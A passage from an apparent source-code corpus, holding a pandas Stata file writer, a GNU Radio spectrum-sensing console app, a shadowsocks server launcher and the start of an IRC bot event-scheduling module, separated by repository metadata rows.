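# positions and each format gains a leading "%".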
def _dtype_to_stata_type(dtype, column):
"""
    Converts numpy dtypes to stata types. Returns the single character whose ordinal encodes the type.
See TYPE_MAP and comments for an explanation. This is also explained in
the dta spec.
1 - 244 are strings of this length
Pandas Stata
251 - chr(251) - for int8 byte
252 - chr(252) - for int16 int
253 - chr(253) - for int32 long
254 - chr(254) - for float32 float
255 - chr(255) - for double double
If there are dates to convert, then dtype will already have the correct
type inserted.
"""
# TODO: expand to handle datetime to integer conversion
if dtype.type == np.string_:
return chr(dtype.itemsize)
elif dtype.type == np.object_: # try to coerce it to the biggest string
# not memory efficient, what else could we
# do?
itemsize = max_len_string_array(_ensure_object(column.values))
return chr(max(itemsize, 1))
elif dtype == np.float64:
return chr(255)
elif dtype == np.float32:
return chr(254)
elif dtype == np.int32:
return chr(253)
elif dtype == np.int16:
return chr(252)
elif dtype == np.int8:
return chr(251)
else: # pragma : no cover
raise NotImplementedError("Data type %s not supported." % dtype)
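# For instance (illustrative, not in the original source): np.dtype(np.float64)
# maps to chr(255), while a fixed-width string dtype such as "S10" maps to
# chr(10), its item size.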
def _dtype_to_default_stata_fmt(dtype, column):
"""
Maps numpy dtype to stata's default format for this type. Not terribly
important since users can change this in Stata. Semantics are
object -> "%DDs" where DD is the length of the string. If not a string,
raise ValueError
float64 -> "%10.0g"
float32 -> "%9.0g"
int64 -> "%9.0g"
int32 -> "%12.0g"
int16 -> "%8.0g"
int8 -> "%8.0g"
"""
# TODO: Refactor to combine type with format
# TODO: expand this to handle a default datetime format?
if dtype.type == np.object_:
inferred_dtype = infer_dtype(column.dropna())
if not (inferred_dtype in ('string', 'unicode') or
len(column) == 0):
raise ValueError('Writing general object arrays is not supported')
itemsize = max_len_string_array(_ensure_object(column.values))
if itemsize > 244:
raise ValueError(excessive_string_length_error % column.name)
return "%" + str(max(itemsize, 1)) + "s"
elif dtype == np.float64:
return "%10.0g"
elif dtype == np.float32:
return "%9.0g"
elif dtype == np.int32:
return "%12.0g"
elif dtype == np.int8 or dtype == np.int16:
return "%8.0g"
else: # pragma : no cover
raise NotImplementedError("Data type %s not supported." % dtype)
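# For instance (illustrative, not in the original source): a float64 column
# yields "%10.0g", while an object column whose longest string has 12
# characters yields "%12s".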
class StataWriter(StataParser):
"""
A class for writing Stata binary dta files
Parameters
----------
fname : str or buffer
String path of file-like object
data : DataFrame
Input to save
convert_dates : dict
Dictionary mapping columns containing datetime types to stata internal
        format to use when writing the dates. Options are 'tc', 'td', 'tm',
'tw', 'th', 'tq', 'ty'. Column can be either an integer or a name.
Datetime columns that do not have a conversion type specified will be
converted to 'tc'. Raises NotImplementedError if a datetime column has
timezone information
write_index : bool
Write the index to Stata dataset.
encoding : str
Default is latin-1. Unicode is not supported
byteorder : str
Can be ">", "<", "little", or "big". default is `sys.byteorder`
time_stamp : datetime
A datetime to use as file creation date. Default is the current time
dataset_label : str
A label for the data set. Must be 80 characters or smaller.
variable_labels : dict
Dictionary containing columns as keys and variable labels as values.
Each label must be 80 characters or smaller.
.. versionadded:: 0.19.0
Returns
-------
writer : StataWriter instance
The StataWriter instance has a write_file method, which will
write the file to the given `fname`.
Raises
------
NotImplementedError
* If datetimes contain timezone information
ValueError
        * Columns listed in convert_dates are neither datetime64[ns]
          nor datetime.datetime
* Column dtype is not representable in Stata
* Column listed in convert_dates is not in DataFrame
* Categorical label contains more than 32,000 characters
Examples
--------
>>> import pandas as pd
>>> data = pd.DataFrame([[1.0, 1]], columns=['a', 'b'])
>>> writer = StataWriter('./data_file.dta', data)
>>> writer.write_file()
Or with dates
>>> from datetime import datetime
>>> data = pd.DataFrame([[datetime(2000,1,1)]], columns=['date'])
>>> writer = StataWriter('./date_data_file.dta', data, {'date' : 'tw'})
>>> writer.write_file()
"""
def __init__(self, fname, data, convert_dates=None, write_index=True,
encoding="latin-1", byteorder=None, time_stamp=None,
data_label=None, variable_labels=None):
super(StataWriter, self).__init__(encoding)
self._convert_dates = {} if convert_dates is None else convert_dates
self._write_index = write_index
self._time_stamp = time_stamp
self._data_label = data_label
self._variable_labels = variable_labels
# attach nobs, nvars, data, varlist, typlist
self._prepare_pandas(data)
if byteorder is None:
byteorder = sys.byteorder
self._byteorder = _set_endianness(byteorder)
self._fname = fname
self.type_converters = {253: np.int32, 252: np.int16, 251: np.int8}
def _write(self, to_write):
"""
Helper to call encode before writing to file for Python 3 compat.
"""
if compat.PY3:
self._file.write(to_write.encode(self._encoding or
self._default_encoding))
else:
self._file.write(to_write)
def _prepare_categoricals(self, data):
"""Check for categorical columns, retain categorical information for
Stata file and convert categorical data to int"""
is_cat = [is_categorical_dtype(data[col]) for col in data]
self._is_col_cat = is_cat
self._value_labels = []
if not any(is_cat):
return data
get_base_missing_value = StataMissingValue.get_base_missing_value
index = data.index
data_formatted = []
for col, col_is_cat in zip(data, is_cat):
if col_is_cat:
self._value_labels.append(StataValueLabel(data[col]))
dtype = data[col].cat.codes.dtype
if dtype == np.int64:
raise ValueError('It is not possible to export '
'int64-based categorical data to Stata.')
values = data[col].cat.codes.values.copy()
# Upcast if needed so that correct missing values can be set
if values.max() >= get_base_missing_value(dtype):
if dtype == np.int8:
dtype = np.int16
elif dtype == np.int16:
dtype = np.int32
else:
dtype = np.float64
values = np.array(values, dtype=dtype)
# Replace missing values with Stata missing value for type
values[values == -1] = get_base_missing_value(dtype)
data_formatted.append((col, values, index))
else:
data_formatted.append((col, data[col]))
return DataFrame.from_items(data_formatted)
def _replace_nans(self, data):
# return data
"""Checks floating point data columns for nans, and replaces these with
the generic Stata for missing value (.)"""
for c in data:
dtype = data[c].dtype
if dtype in (np.float32, np.float64):
if dtype == np.float32:
replacement = self.MISSING_VALUES['f']
else:
replacement = self.MISSING_VALUES['d']
data[c] = data[c].fillna(replacement)
return data
def _check_column_names(self, data):
"""
Checks column names to ensure that they are valid Stata column names.
This includes checks for:
* Non-string names
* Stata keywords
* Variables that start with numbers
* Variables with names that are too long
When an illegal variable name is detected, it is converted, and if
dates are exported, the variable name is propagated to the date
conversion dictionary
"""
converted_names = []
columns = list(data.columns)
original_columns = columns[:]
duplicate_var_id = 0
for j, name in enumerate(columns):
orig_name = name
if not isinstance(name, string_types):
name = text_type(name)
for c in name:
if (c < 'A' or c > 'Z') and (c < 'a' or c > 'z') and \
(c < '0' or c > '9') and c != '_':
name = name.replace(c, '_')
# Variable name must not be a reserved word
if name in self.RESERVED_WORDS:
name = '_' + name
# Variable name may not start with a number
if name[0] >= '0' and name[0] <= '9':
name = '_' + name
name = name[:min(len(name), 32)]
if not name == orig_name:
# check for duplicates
while columns.count(name) > 0:
# prepend ascending number to avoid duplicates
name = '_' + str(duplicate_var_id) + name
name = name[:min(len(name), 32)]
duplicate_var_id += 1
                # need to possibly encode the orig name if it's unicode
try:
orig_name = orig_name.encode('utf-8')
except:
pass
converted_names.append(
'{0} -> {1}'.format(orig_name, name))
columns[j] = name
data.columns = columns
# Check date conversion, and fix key if needed
if self._convert_dates:
for c, o in zip(columns, original_columns):
if c != o:
self._convert_dates[c] = self._convert_dates[o]
del self._convert_dates[o]
if converted_names:
import warnings
ws = invalid_name_doc.format('\n '.join(converted_names))
warnings.warn(ws, InvalidColumnName)
return data
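    # Illustrative renames performed by _check_column_names (comment added
    # for clarity, not in the original source): "my col" becomes "my_col",
    # "2theta" becomes "_2theta", and a name appearing in RESERVED_WORDS
    # gets a leading underscore.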
def _prepare_pandas(self, data):
# NOTE: we might need a different API / class for pandas objects so
# we can set different semantics - handle this with a PR to pandas.io
data = data.copy()
if self._write_index:
data = data.reset_index()
# Ensure column names are strings
data = self._check_column_names(data)
# Check columns for compatibility with stata, upcast if necessary
# Raise if outside the supported range
data = _cast_to_stata_types(data)
# Replace NaNs with Stata missing values
data = self._replace_nans(data)
# Convert categoricals to int data, and strip labels
data = self._prepare_categoricals(data)
self.nobs, self.nvar = data.shape
self.data = data
self.varlist = data.columns.tolist()
dtypes = data.dtypes
# Ensure all date columns are converted
for col in data:
if col in self._convert_dates:
continue
if is_datetime64_dtype(data[col]):
self._convert_dates[col] = 'tc'
self._convert_dates = _maybe_convert_to_int_keys(self._convert_dates,
self.varlist)
for key in self._convert_dates:
new_type = _convert_datetime_to_stata_type(
self._convert_dates[key]
)
dtypes[key] = np.dtype(new_type)
self.typlist = []
self.fmtlist = []
for col, dtype in dtypes.iteritems():
self.fmtlist.append(_dtype_to_default_stata_fmt(dtype, data[col]))
self.typlist.append(_dtype_to_stata_type(dtype, data[col]))
# set the given format for the datetime cols
if self._convert_dates is not None:
for key in self._convert_dates:
self.fmtlist[key] = self._convert_dates[key]
def write_file(self):
self._file = _open_file_binary_write(
self._fname, self._encoding or self._default_encoding
)
try:
self._write_header(time_stamp=self._time_stamp,
data_label=self._data_label)
self._write_descriptors()
self._write_variable_labels()
# write 5 zeros for expansion fields
self._write(_pad_bytes("", 5))
self._prepare_data()
self._write_data()
self._write_value_labels()
finally:
self._file.close()
def _write_value_labels(self):
for vl in self._value_labels:
self._file.write(vl.generate_value_label(self._byteorder,
self._encoding))
def _write_header(self, data_label=None, time_stamp=None):
byteorder = self._byteorder
# ds_format - just use 114
self._file.write(struct.pack("b", 114))
# byteorder
self._write(byteorder == ">" and "\x01" or "\x02")
# filetype
self._write("\x01")
# unused
self._write("\x00")
# number of vars, 2 bytes
self._file.write(struct.pack(byteorder + "h", self.nvar)[:2])
# number of obs, 4 bytes
self._file.write(struct.pack(byteorder + "i", self.nobs)[:4])
# data label 81 bytes, char, null terminated
if data_label is None:
self._file.write(self._null_terminate(_pad_bytes("", 80)))
else:
self._file.write(
self._null_terminate(_pad_bytes(data_label[:80], 80))
)
# time stamp, 18 bytes, char, null terminated
# format dd Mon yyyy hh:mm
if time_stamp is None:
time_stamp = datetime.datetime.now()
elif not isinstance(time_stamp, datetime.datetime):
raise ValueError("time_stamp should be datetime type")
self._file.write(
self._null_terminate(time_stamp.strftime("%d %b %Y %H:%M"))
)
def _write_descriptors(self, typlist=None, varlist=None, srtlist=None,
fmtlist=None, lbllist=None):
nvar = self.nvar
# typlist, length nvar, format byte array
for typ in self.typlist:
self._write(typ)
# varlist names are checked by _check_column_names
# varlist, requires null terminated
for name in self.varlist:
name = self._null_terminate(name, True)
name = _pad_bytes(name[:32], 33)
self._write(name)
# srtlist, 2*(nvar+1), int array, encoded by byteorder
srtlist = _pad_bytes("", 2 * (nvar + 1))
self._write(srtlist)
# fmtlist, 49*nvar, char array
for fmt in self.fmtlist:
self._write(_pad_bytes(fmt, 49))
# lbllist, 33*nvar, char array
for i in range(nvar):
# Use variable name when categorical
if self._is_col_cat[i]:
name = self.varlist[i]
name = self._null_terminate(name, True)
name = _pad_bytes(name[:32], 33)
self._write(name)
else: # Default is empty label
self._write(_pad_bytes("", 33))
def _write_variable_labels(self):
# Missing labels are 80 blank characters plus null termination
blank = _pad_bytes('', 81)
if self._variable_labels is None:
for i in range(self.nvar):
self._write(blank)
return
for col in self.data:
if col in self._variable_labels:
label = self._variable_labels[col]
if len(label) > 80:
raise ValueError('Variable labels must be 80 characters '
'or fewer')
is_latin1 = all(ord(c) < 256 for c in label)
if not is_latin1:
raise ValueError('Variable labels must contain only '
'characters that can be encoded in '
'Latin-1')
self._write(_pad_bytes(label, 81))
else:
self._write(blank)
def _prepare_data(self):
data = self.data
typlist = self.typlist
convert_dates = self._convert_dates
# 1. Convert dates
if self._convert_dates is not None:
for i, col in enumerate(data):
if i in convert_dates:
data[col] = _datetime_to_stata_elapsed_vec(data[col],
self.fmtlist[i])
# 2. Convert bad string data to '' and pad to correct length
dtype = []
data_cols = []
has_strings = False
for i, col in enumerate(data):
typ = ord(typlist[i])
if typ <= 244:
has_strings = True
data[col] = data[col].fillna('').apply(_pad_bytes, args=(typ,))
stype = 'S%d' % typ
dtype.append(('c' + str(i), stype))
string = data[col].str.encode(self._encoding)
data_cols.append(string.values.astype(stype))
else:
dtype.append(('c' + str(i), data[col].dtype))
data_cols.append(data[col].values)
dtype = np.dtype(dtype)
if has_strings:
self.data = np.fromiter(zip(*data_cols), dtype=dtype)
else:
self.data = data.to_records(index=False)
def _write_data(self):
data = self.data
data.tofile(self._file)
def _null_terminate(self, s, as_string=False):
null_byte = '\x00'
if compat.PY3 and not as_string:
s += null_byte
return s.encode(self._encoding)
else:
s += null_byte
return s
| gpl-3.0 | -911,198,936,538,238,300 | 35.574901 | 90 | 0.544443 | false | 3.938943 | false | false | false |
ComputerNetworks-UFRGS/OpERA | python/app/simpleSS.py | 1 | 15314 | #!/usr/bin/env python
"""
Copyright 2013 OpERA
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import sys
path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../"))
sys.path.insert(0, path)
from gnuradio import gr
from gnuradio import blocks
from gnuradio.eng_option import eng_option
from optparse import OptionParser
from struct import *
from threading import Thread
import time
import random
import numpy as np
from abc import ABCMeta, abstractmethod
#Project imports:
from OpERAFlow import OpERAFlow
from device import *
from sensing import EnergyDecision
from sensing import EnergySSArch, EnergyCalculator
from packet import PacketGMSKRx, PacketOFDMRx, PacketGMSKTx, PacketOFDMTx, SimpleTx
from utils import Channel, Logger, ChannelModeler
# Try to import easygui.
#try:
# import easygui
# easygui_import = True
#
#except ImportError:
easygui_import = False
# Constants used in the program:
# ranges:
MIN_FREQ = 100e6
MAX_FREQ = 2.2e9
MIN_GAIN = 0
MAX_GAIN = 30
# options
STR_FREQ = "Frequency"
STR_GAIN = "Gain multiplier"
#questions
QUESTION_SET_FREQ = "Enter a frequency value. Should be in range"
QUESTION_SET_GAIN = "Enter the gain multiplier. Should be in range"
# menu (operations)
NEW_FREQ = "Set a new frequency"
GAIN_MULTIPLIER = "Set a new gain multiplier"
QUIT = "Quit"
# integers representing the operations
OPT_SET_FREQ = 1
OPT_SET_GAIN = 2
OPT_QUIT = 3
# others
MIN_OPT = 1
MAX_OPT = 3
YES = 1
NO = 0
ENTER = "enter"
RAW_ENTER = ""
def clear_screen():
"""
    Check the OS and use an appropriate function to clear the screen
"""
# Clear Windows command prompt.
if (os.name in ('ce', 'nt', 'dos')):
os.system('cls')
# Clear the Linux terminal.
elif ('posix' in os.name):
os.system('clear')
class OpERAUtils(object):
"""
Class with useful methods from OpERA
"""
def __init__(self):
"""
CTOR
"""
pass
@staticmethod
def device_definition():
"""
Definition of the devices used in the program.
"""
tb = OpERAFlow(name='US')
uhd_source = UHDSource()
uhd_source.samp_rate = 195512
energy = EnergySSArch(fft_size=512, mavg_size=5, algorithm=EnergyDecision(th=0))
radio = RadioDevice(name="radio")
radio.add_arch(source=uhd_source, arch=energy, sink=blocks.probe_signal_f(), uhd_device=uhd_source, name='ss')
tb.add_radio(radio, "radio")
return tb, radio
@staticmethod
def add_print_list():
"""
Adds to the print list (method of the Logger class)
"""
print "\n******************************************************************\n"
print "\nPrinting the energy\n"
Logger.add_to_print_list("energy_decision", "energy")
print "\n******************************************************************\n"
@staticmethod
def printing_energy():
"""
Prints the energy until the ENTER key is pressed.
"""
clear_screen()
key = None
time.sleep(0.1)
Logger._enable = True
# Press enter to exit (stop the printing).
while key is not ENTER:
OpERAUtils.add_print_list()
key = raw_input()
# If "enter" key was pressed, exit the loop:
if RAW_ENTER in key:
key = ENTER
Logger._enable = False
Logger.remove_from_print_list("energy_decision", "energy")
class AbstractMenu(object):
"""
Abstract class for the menus.
"""
__metaclass__ = ABCMeta
def __init__(self):
"""
CTOR
"""
pass
def get_value_in_range(self, min_value, max_value, question, option):
"""
Reads a value (from the user) and check if it is in range (ie, min_value >= value <= max_value).
@param min_value Mininum value of the range (float number)
@param max_value Maximum value of the range (float number)
@param question Question asked (string type)
@param option (string type)
@return float_value
@return no_value Indicates if the value returned is valid (no_value = False) or if the user has
cancelled the operation (no_value = True).
"""
# Check if the chosen option is "Set Frequency" or "Set Gain Multiplier", in order
# to use the most appropriate string formatting.
if option is STR_GAIN:
mens = "%s (%.2f, %.2f)." % (question, min_value, max_value)
elif option is STR_FREQ:
mens = "%s (%.2e, %.2e)." % (question, min_value, max_value)
value = ""
float_value = False
value_ok = False
no_value = False
while value_ok is False and no_value is False:
value = self._get_value(mens)
# If it is a valid input.
if value is not None:
try:
float_value = float(value)
# If the value is a float number but it's not in range, shows an error message
if float_value < min_value or float_value > max_value:
if option is STR_GAIN:
range_error = "%s should be in range (%.2f, %.2f)." % (option, min_value, max_value)
elif option is STR_FREQ:
range_error = "%s should be in range (%.2e, %.2e)." % (option, min_value, max_value)
self._show_error_msg(range_error)
# If the value if a float number and it's in range, so the input is valid. Exits the loop.
else:
value_ok = True
# If the input is not a float number, shows an error message.
except ValueError:
type_error = "%s should be a float number." % (option)
self._show_error_msg(type_error)
# If the user has cancelled the operation.
elif value is None:
# Check if the user wants to quit.
choices = ["Yes", "No"]
msg = "Quit the %s setter? " % (option.lower())
reply = self._choose_option(msg, choices)
if reply is "Yes":
no_value = True
# Returns the value (casted to float) and a boolean that indicates if the value returned
# is valid or not(in case of cancelled operation).
return float_value, no_value
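    # Illustrative call (comment added for clarity, not in the original
    # source): for a console or easygui menu instance m,
    # m.get_value_in_range(MIN_FREQ, MAX_FREQ, QUESTION_SET_FREQ, STR_FREQ)
    # returns e.g. (100000000.0, False) when the user types "100e6", or
    # (False, True) if the user cancels the dialog.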
@abstractmethod
def _show_error_msg(self, msg):
"""
Shows an error message with the appropriate GUI.
@param msg Error message.
"""
pass
@abstractmethod
def _choose_option(self, msg, choices):
"""
Let the user choose an option and return the integer that represents it.
@param msg Instruction message
@param choices List of choices
"""
pass
@abstractmethod
def _get_value(self, msg):
"""
Returns the read value
@param msg The message to instruct the user.
"""
pass
class Menu(AbstractMenu):
"""
Class that manages the GUIs.
"""
def __init__(self):
"""
CTOR
"""
AbstractMenu.__init__(self)
# If the import was successful, uses Easygui as GUI.
if easygui_import is True:
self._menu = EasyguiMenu()
# If it isn't, uses the Console.
else:
self._menu = ConsoleMenu()
def get_value_in_range(self, min_value, max_value, question, option):
"""
@param min_value Mininum value of the range (float number)
@param max_value Maximum value of the range (float number)
@param question Question asked (string type)
        @param option Option label (one of the string constants, e.g. STR_FREQ or STR_GAIN)
"""
return self._menu.get_value_in_range(min_value, max_value, question, option)
def main_menu(self):
"""
Shows the main menu.
"""
self._menu._main_menu()
def _show_error_msg(self, msg):
"""
Shows the message.
@param msg The message to show.
"""
self._menu._show_error_msg(msg)
def _choose_option(self, msg, choices):
"""
Let the user choose an option from a list of them.
@param msg Instruction message
@param choices A list of choices.
"""
return self._menu._choose_option(msg, choices)
def _get_value(self, msg):
"""
Gets an input from the user.
@param msg Instruction message.
"""
        return self._menu._get_value(msg)
def _show_menu(self, str_list):
"""
Shows a menu with options and let the user choose one of them.
@param str_list A list with the options of the menu (strings).
"""
return self._menu._show_menu(str_list)
class EasyguiMenu(AbstractMenu):
"""
Class for the menu (shown with easygui).
"""
def __init__(self):
"""
CTOR
"""
AbstractMenu.__init__(self)
def _show_error_msg(self, msg):
"""
Easygui implementation of showing a message.
@param msg Message to show.
"""
easygui.msgbox(msg)
def _choose_option(self, msg, choices):
"""
Easygui implementation of letting the user choose an option.
@param msg Instruction message.
@param choices A list of choices.
"""
reply = easygui.buttonbox(msg, choices=choices)
        if reply == "Yes":
            return YES
        elif reply == "No":
            return NO
def _get_value(self, msg):
"""
Easygui implementation of letting the user enter a value.
@param msg Instruction message
"""
value = easygui.enterbox(msg)
return value
def _show_menu(self, str_list):
"""
Easygui implementation of showing a menu and allowing the user to choose
one of its options.
@param str_list A list with the menu options.
"""
choices = str_list
msg = "Choose one option: "
reply = easygui.buttonbox(msg, choices=choices)
if reply is NEW_FREQ:
int_reply = 1
elif reply is GAIN_MULTIPLIER:
int_reply = 2
elif reply is QUIT:
int_reply = 3
return int_reply
class ConsoleMenu(AbstractMenu):
"""
Class for the menu (shown in console)
"""
def __init__(self):
"""
CTOR
"""
AbstractMenu.__init__(self)
def _show_error_msg(self, msg):
"""
Console implementation of showing a message
@param msg Message to show.
"""
print msg
def _choose_option(self, msg, choices):
"""
Console implementation of letting the user choose an option.
@param msg Instruction message
@param choices A list of choices.
"""
reply_ok = False
while reply_ok is False:
print msg
for num, opt in enumerate(choices):
print "%i: %s" % (num, opt)
reply = raw_input("\nChoose one option: ")
            try:
                int_reply = int(reply)
                if int_reply == 0:
                    # the first listed choice ("Yes") maps to the YES constant
                    return YES
                elif int_reply == 1:
                    # the second listed choice ("No") maps to the NO constant
                    return NO
                else:
                    print "\nReply should be 0 (Yes) or 1 (No)."
            except ValueError:
                print "\nReply should be an integer."
def _get_value(self, msg):
"""
Console implementation of letting the user enter a value.
@param msg Instruction message.
"""
str_value = raw_input("\n" + msg)
return str_value
def _show_menu(self, str_list):
"""
Console implementation of showing a menu and letting the user choose
one of its options.
@param str_list A list with the menu options.
"""
print "*****************************************************************\n"
for num, opt in enumerate(str_list):
print "%i. %s" % (num, opt)
print "*****************************************************************\n\n"
input_ok = False
while input_ok is False:
choice = raw_input("Choose one option: ")
if choice.isdigit() is True:
int_choice = int(choice)
if int_choice < MIN_OPT or int_choice > MAX_OPT:
print "\n\nChosen operation is invalid.\n"
else:
input_ok = True
else:
print "\n\nEnter a number that corresponds to a valid operation.\n"
return int_choice
def main(tb, radio):
"""
Main function
@param tb The topblock.
@param radio The radio device.
"""
# instance of Menu class
menu = Menu()
tb.start()
radio.set_center_freq(100e6)
continue_loop = True
no_freq = False
while continue_loop is True:
reply = menu._show_menu([NEW_FREQ, GAIN_MULTIPLIER, QUIT])
# Operation is quit.
if reply is OPT_QUIT:
choices = ["Yes", "No"]
msg = "Are you sure?"
reply_2 = menu._choose_option(msg, choices=choices)
# If the answer is YES, quit the program. Else, continues in the loop.
if reply_2 is YES:
tb.stop()
continue_loop = False
print "\n******************************************"
print "\tQuitting the program."
print "******************************************\n"
os._exit(1)
# Operation is "set a new frequency".
elif reply is OPT_SET_FREQ:
# gets the frequency
freq, no_freq = menu.get_value_in_range(MIN_FREQ, MAX_FREQ, QUESTION_SET_FREQ, STR_FREQ)
if no_freq is False:
radio.set_center_freq(freq)
# prints the energy
OpERAUtils.printing_energy()
# Operation is "set the gain multiplier".
elif reply is OPT_SET_GAIN:
# gets the gain
gain, no_gain = menu.get_value_in_range(MIN_GAIN, MAX_GAIN, QUESTION_SET_GAIN, STR_GAIN)
if no_gain is False:
radio.set_gain(gain)
OpERAUtils.printing_energy()
if __name__ == "__main__":
tb, radio = OpERAUtils.device_definition()
try:
main(tb, radio)
except KeyboardInterrupt:
tb.stop()
Logger.dump('./dump/', '', 0)
| apache-2.0 | -8,469,623,994,222,200,000 | 27.150735 | 118 | 0.547146 | false | 4.106731 | false | false | false |
tension/shadowsocks | server.py | 2 | 1689 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2015 breakwall
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import sys
import threading
import os
if __name__ == '__main__':
import inspect
os.chdir(os.path.dirname(os.path.realpath(inspect.getfile(inspect.currentframe()))))
import server_pool
import db_transfer
from shadowsocks import shell
from configloader import load_config, get_config
class MainThread(threading.Thread):
def __init__(self, obj):
threading.Thread.__init__(self)
self.obj = obj
def run(self):
self.obj.thread_db(self.obj)
def stop(self):
self.obj.thread_db_stop()
def main():
shell.check_python()
if False:
db_transfer.DbTransfer.thread_db()
else:
if get_config().API_INTERFACE == 'mudbjson':
thread = MainThread(db_transfer.MuJsonTransfer)
elif get_config().API_INTERFACE == 'sspanelv2':
thread = MainThread(db_transfer.DbTransfer)
else:
thread = MainThread(db_transfer.Dbv3Transfer)
thread.start()
try:
while thread.is_alive():
time.sleep(10)
except (KeyboardInterrupt, IOError, OSError) as e:
import traceback
traceback.print_exc()
thread.stop()
if __name__ == '__main__':
main()
| apache-2.0 | -303,056,126,023,824,800 | 24.984615 | 85 | 0.718769 | false | 3.324803 | false | false | false |
Heufneutje/PyHeufyBot | heufybot/modules/commands/event.py | 1 | 13414 | from twisted.internet.task import LoopingCall
from twisted.plugin import IPlugin
from heufybot.moduleinterface import IBotModule
from heufybot.modules.commandinterface import BotCommand
from heufybot.utils import isNumber, networkName
from heufybot.utils.timeutils import now, strftimeWithTimezone, timeDeltaString
from zope.interface import implements
from datetime import datetime, timedelta
import re
class EventCommand(BotCommand):
implements(IPlugin, IBotModule)
name = "Event"
def triggers(self):
return ["event", "events", "timetill", "timesince", "dateof", "revent", "subevent", "unsubevent"]
def load(self):
self.help = "Commands: event <yyyy-MM-dd> (<HH:mm>) <event>, events (<days>), timetill <event>, timesince " \
"<event>, dateof <event>, revent <event>, subevent, unsubevent | Add, request or remove an event " \
"or subscribe to them."
        self.commandHelp = {
            "event": "event <yyyy-MM-dd> (<HH:mm>) <event> | Add an event to the events database.",
            "events": "events <days> | Request all events that occur within the given number of days. The default is "
                      "a week. The maximum is a year.",
            "timetill": "timetill <event> | Request the amount of time until a specified event occurs.",
            "timesince": "timesince <event> | Request the amount of time since a specified event occurred.",
            "dateof": "dateof <event> | Request the date of a specified event.",
            "revent": "revent <event> | Remove a specified event that was added by you from the events database.",
            "subevent": "subevent | Subscribe to event announcements. PM to subscribe to them in PM. Requires admin "
                        "permission to subscribe channels.",
            "unsubevent": "unsubevent | Unsubscribe from event announcements. PM to unsubscribe from them in PM. "
                          "Requires admin permission to unsubscribe channels."
        }
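        # Illustrative inputs (comment added for clarity, not in the original
        # module): "event 2016-05-01 14:30 Release party" stores a timed
        # event, while "event 2016-05-01 Release party" stores one with only
        # a date; both match the strptime formats used in execute() below.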
if "events" not in self.bot.storage:
self.bot.storage["events"] = {}
self.events = self.bot.storage["events"]
if "event-subs" not in self.bot.storage:
self.bot.storage["event-subs"] = {}
self.subscriptions = self.bot.storage["event-subs"]
self.announcementLoopCall = LoopingCall(self.checkEvents)
self.announcementLoopCall.start(300, now=True) # Announce events every 5 minutes
def checkPermissions(self, server, source, user, command):
if command in ["subevent", "unsubevent"] and source[0] in self.bot.servers[server].supportHelper.chanTypes:
channel = self.bot.servers[server].channels[source]
if channel.userIsChanOp(user):
return True
return not self.bot.moduleHandler.runActionUntilFalse("checkadminpermission", server, source, user,
"event-subscribe")
return True
def execute(self, server, source, command, params, data):
if networkName(self.bot, server) not in self.events:
self.events[networkName(self.bot, server)] = []
if command == "event":
if len(params) == 0:
self.replyPRIVMSG(server, source, "Add what event?")
return
try:
date = datetime.strptime(" ".join(params[0:2]), "%Y-%m-%d %H:%M")
eventOffset = 2
if len(params) < 3:
self.replyPRIVMSG(server, source, "Add what event?")
return
except ValueError:
try:
date = datetime.strptime(params[0], "%Y-%m-%d")
eventOffset = 1
if len(params) < 2:
self.replyPRIVMSG(server, source, "Add what event?")
return
except ValueError:
e = "The date format you specified is invalid. The format is yyyy-MM-dd or yyyy-MM-dd HH:mm."
self.replyPRIVMSG(server, source, e)
return
event = {
"event": " ".join(params[eventOffset:]),
"date": date,
"user": data["user"].nick,
"fired": True if date < now() else False
}
self.events[networkName(self.bot, server)].append(event)
self.bot.storage["events"] = self.events
m = "Event {!r} on date {} was added to the events database!".format(event["event"],
strftimeWithTimezone(date))
self.replyPRIVMSG(server, source, m)
elif command == "timetill":
if len(params) == 0:
self.replyPRIVMSG(server, source, "You didn't specify an event")
return
events = [x for x in self.events[networkName(self.bot, server)] if x["date"] > now()]
events.sort(key=lambda item: item["date"])
for event in events:
if re.search(" ".join(params), event["event"], re.IGNORECASE):
m = "{}'s event {!r} will occur in {}.".format(event["user"], event["event"], timeDeltaString(
event["date"], now()))
self.replyPRIVMSG(server, source, m)
break
else:
m = "No events matching {!r} were found in the events database.".format(" ".join(params))
self.replyPRIVMSG(server, source, m)
elif command == "timesince":
if len(params) == 0:
self.replyPRIVMSG(server, source, "You didn't specify an event")
return
events = [x for x in self.events[networkName(self.bot, server)] if x["date"] < now()]
events.sort(key=lambda item: item["date"], reverse=True)
for event in events:
if re.search(" ".join(params), event["event"], re.IGNORECASE):
m = "{}'s event {!r} occurred {} ago.".format(event["user"], event["event"], timeDeltaString(
now(), event["date"]))
self.replyPRIVMSG(server, source, m)
break
else:
m = "No events matching {!r} were found in the events database.".format(" ".join(params))
self.replyPRIVMSG(server, source, m)
elif command == "dateof":
if len(params) == 0:
self.replyPRIVMSG(server, source, "You didn't specify an event")
return
events = [x for x in self.events[networkName(self.bot, server)] if x["date"] > now()]
events.sort(key=lambda item: item["date"])
for event in events:
if re.search(" ".join(params), event["event"], re.IGNORECASE):
m = "{}'s event {!r} will occur on {}.".format(event["user"], event["event"],
strftimeWithTimezone(event["date"]))
self.replyPRIVMSG(server, source, m)
break
else:
events = [x for x in self.events[networkName(self.bot, server)] if x["date"] < now()]
events.sort(key=lambda item: item["date"], reverse=True)
for event in events:
if re.search(" ".join(params), event["event"], re.IGNORECASE):
m = "{}'s event {!r} occurred on {}.".format(event["user"], event["event"],
strftimeWithTimezone(event["date"]))
self.replyPRIVMSG(server, source, m)
break
else:
m = "No events matching {!r} were found in the events database.".format(" ".join(params))
self.replyPRIVMSG(server, source, m)
elif command == "events":
if len(params) == 0 or not isNumber(params[0]):
days = 7
else:
